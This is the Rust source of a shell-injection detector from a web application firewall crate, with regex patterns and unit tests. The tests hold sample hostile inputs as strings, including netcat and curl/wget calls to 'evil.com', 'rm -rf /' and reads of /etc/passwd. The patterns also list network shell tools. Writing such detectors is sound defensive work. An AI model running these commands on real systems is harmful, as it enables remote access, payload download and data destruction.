bext-waf 0.2.0

Web Application Firewall for bext — rate limiting, IP filtering, GeoIP, rule engine
Documentation
//! Shell/command injection detection — semicolons, pipes, backticks, `$()`
//! subshells, and common command patterns (`/bin/sh`, `wget`, `curl`).

use std::sync::OnceLock;

use regex::RegexSet;

static SHELL_PATTERNS: OnceLock<RegexSet> = OnceLock::new();

/// Descriptions matching each pattern by index.
static SHELL_DESCRIPTIONS: &[&str] = &[
    "Command chaining with semicolon",
    "Command chaining with pipe",
    "Command chaining with &&",
    "Command chaining with ||",
    "Backtick command substitution",
    "$() command substitution",
    "Shell redirection to file",
    "Shell input redirection",
    "Common command after metacharacter (cat/ls/id/whoami/uname/pwd/wget/curl)",
    "Environment variable expansion in path",
    "/bin/ or /usr/bin/ command execution",
    "Bash/sh -c invocation",
    "Brace expansion with command ({cmd,args})",
    "Wildcard path abuse (/???/??ss??)",
    "ANSI-C quoting hex escape ($'\\xNN')",
];

fn patterns() -> &'static RegexSet {
    SHELL_PATTERNS.get_or_init(|| {
        RegexSet::new([
            // 0: Command chaining with semicolon: "; ls", "; cat", "; rm"
            r";\s*(ls|cat|rm|cp|mv|chmod|chown|wget|curl|whoami|id|uname|pwd|echo|touch|mkdir|kill|ps|nc|ncat|bash|sh|python|perl|ruby|php|node)\b",
            // 1: Command chaining with pipe: "| cat", "| nc"
            r"\|\s*(cat|nc|ncat|sh|bash|tee|head|tail|less|more|grep|awk|sed|sort|python|perl|ruby|php|wget|curl|whoami|id|uname)\b",
            // 2: Command chaining with &&: "&& whoami"
            r"&&\s*(ls|cat|rm|whoami|id|uname|pwd|wget|curl|bash|sh|python|perl|ruby|php|echo|nc|ncat|chmod)\b",
            // 3: Command chaining with ||: "|| id"
            r"\|\|\s*(ls|cat|rm|whoami|id|uname|pwd|wget|curl|bash|sh|python|perl|ruby|php|echo|nc|ncat|chmod)\b",
            // 4: Backtick command substitution: `command`
            r"`[^`]+`",
            // 5: $() command substitution: $(command)
            r"\$\([^)]+\)",
            // 6: Shell output redirection: "> /tmp/file", ">> /etc/passwd"
            r">{1,2}\s*/\w",
            // 7: Shell input redirection: "< /etc/passwd"
            r"<\s+/\w",
            // 8: Common dangerous commands after any metachar context
            r"(?i)\b(wget|curl)\s+.*(http|ftp)s?://",
            // 9: Environment variable expansion used in paths
            r"\$\{?\w+\}?/",
            // 10: Direct /bin/ or /usr/bin/ command invocation
            r"(?i)/(usr/)?s?bin/(sh|bash|dash|zsh|csh|ksh|python|perl|ruby|php|nc|ncat|wget|curl|cat|ls|rm|chmod|chown|kill|env)\b",
            // 11: bash -c or sh -c invocation
            r"(?i)\b(bash|sh|dash|zsh|ksh)\s+-c\s",
            // 12: Brace expansion: {cat,/etc/passwd}, {ls,-la,/}
            r"\{[^}]*(cat|ls|rm|cp|mv|chmod|wget|curl|whoami|id|sh|bash|python|perl|nc|echo)[^}]*,",
            // 13: Wildcard path abuse: /???/??ss?? (3+ consecutive ? in path-like context)
            r"/\?{3,}",
            // 14: ANSI-C quoting hex escape: $'\x63\x61\x74'
            r"\$'(\\x[0-9a-fA-F]{2}){2,}'",
        ])
        .expect("shell injection regex patterns must compile")
    })
}

/// Check an input string for shell injection patterns.
/// Returns `Some(description)` if a pattern matches.
pub fn check_shell(input: &str) -> Option<String> {
    let set = patterns();
    let matches: Vec<_> = set.matches(input).into_iter().collect();
    if matches.is_empty() {
        None
    } else {
        let idx = matches[0];
        Some(
            SHELL_DESCRIPTIONS
                .get(idx)
                .unwrap_or(&"shell injection")
                .to_string(),
        )
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    // ---- Positive detections ----

    #[test]
    fn detects_semicolon_chaining() {
        assert!(check_shell("; ls -la").is_some());
        assert!(check_shell("; cat /etc/passwd").is_some());
        assert!(check_shell("; rm -rf /").is_some());
        assert!(check_shell("; whoami").is_some());
    }

    #[test]
    fn detects_pipe_chaining() {
        assert!(check_shell("| cat /etc/passwd").is_some());
        assert!(check_shell("| nc evil.com 4444").is_some());
        assert!(check_shell("| whoami").is_some());
    }

    #[test]
    fn detects_and_chaining() {
        assert!(check_shell("&& whoami").is_some());
        assert!(check_shell("&& id").is_some());
        assert!(check_shell("&& curl http://evil.com").is_some());
    }

    #[test]
    fn detects_or_chaining() {
        assert!(check_shell("|| id").is_some());
        assert!(check_shell("|| whoami").is_some());
    }

    #[test]
    fn detects_backtick_execution() {
        assert!(check_shell("`whoami`").is_some());
        assert!(check_shell("`cat /etc/passwd`").is_some());
    }

    #[test]
    fn detects_dollar_paren_execution() {
        assert!(check_shell("$(whoami)").is_some());
        assert!(check_shell("$(cat /etc/passwd)").is_some());
    }

    #[test]
    fn detects_output_redirection() {
        assert!(check_shell("> /tmp/shell.txt").is_some());
        assert!(check_shell(">> /var/log/data").is_some());
    }

    #[test]
    fn detects_bin_invocation() {
        assert!(check_shell("/bin/sh -c 'id'").is_some());
        assert!(check_shell("/usr/bin/python").is_some());
        assert!(check_shell("/bin/bash").is_some());
    }

    #[test]
    fn detects_bash_c_invocation() {
        assert!(check_shell("bash -c 'echo hacked'").is_some());
        assert!(check_shell("sh -c whoami").is_some());
    }

    #[test]
    fn detects_wget_curl_download() {
        assert!(check_shell("wget http://evil.com/shell.sh").is_some());
        assert!(check_shell("curl https://evil.com/payload").is_some());
    }

    #[test]
    fn detects_env_variable_in_path() {
        assert!(check_shell("$HOME/malware").is_some());
        assert!(check_shell("${SHELL}/exec").is_some());
    }

    // ---- False-positive checks ----

    #[test]
    fn allows_normal_text() {
        assert!(check_shell("Hello, how are you today?").is_none());
    }

    #[test]
    fn allows_normal_path() {
        assert!(check_shell("/api/users/123").is_none());
    }

    #[test]
    fn allows_normal_json() {
        assert!(check_shell(r#"{"name":"John","items":[1,2,3]}"#).is_none());
    }

    #[test]
    fn allows_css_selectors() {
        assert!(check_shell("div > span").is_none());
    }

    #[test]
    fn allows_normal_url() {
        assert!(check_shell("https://example.com/page?q=test").is_none());
    }

    #[test]
    fn allows_semicolon_in_css() {
        assert!(check_shell("color: red; font-size: 14px").is_none());
    }
}